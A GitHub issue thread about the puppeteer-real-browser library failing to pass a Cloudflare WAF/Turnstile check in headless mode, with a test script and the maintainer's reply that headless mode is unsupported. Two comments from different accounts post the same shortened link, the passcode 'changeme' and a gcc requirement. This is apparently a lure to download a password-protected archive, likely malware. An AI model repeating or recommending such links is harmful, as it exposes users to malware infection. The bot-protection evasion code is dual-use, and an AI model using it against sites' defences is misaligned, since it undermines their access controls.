### ISSUE TITLE
Can not to bypass Cloudflare WAF while headless false

### ISSUE THREAD

**Issue by meotimdihia** [zfcsoftware/puppeteer-real-browser#164]
Please check the record video:  

[recording.webm](https://github.com/user-attachments/assets/ff7f36ab-a104-4d02-84b4-e0e8d497db8c)

And there is the code:  

```ts
const realBrowserOption = {
    args: ["--start-maximized"],
    turnstile: true,
    headless: true,
    // disableXvfb: true,
    customConfig: {},
    connectOption: {
        defaultViewport: null
    },
    plugins: []
}

test('Cloudflare WAF', async () => {
    const { page, browser } = await connect(realBrowserOption)
    const recorder = await page.screencast({path: 'recording.webm'});
    await page.goto("https://nopecha.com/demo/cloudflare");

    let verify = null
    let startDate = Date.now()
    while (!verify && (Date.now() - startDate) < 30000) {
        verify = await page.evaluate(() => { return document.querySelector('.link_row') ? true : null }).catch(() => null)
        await new Promise(r => setTimeout(r, 1000));
    }
   await recorder.stop();
    await browser.close()

    assert.strictEqual(verify === true, true, "Cloudflare WAF test failed!")
})
```

OS: macOS

**Comment by z3t444** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by NavSethi2006** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by zfcsoftware** [comment]
Can you make it false and try it?
![image](https://github.com/user-attachments/assets/937175de-7e9c-440d-9043-14cd32a68465)

**Comment by meotimdihia** [comment]
@zfcsoftware Sorry, I write the wrong title. The problem happened the option `headless: true`

**Comment by zfcsoftware** [comment]
> @zfcsoftware Sorry, I write the wrong title. The problem happened with the option `headless: true` And the video was recorded in the headless mode.

Currently the library only works fine when using headless: false. true is not supported yet. Sorry. 
https://github.com/zfcsoftware/puppeteer-real-browser/issues/162#issuecomment-2331177318
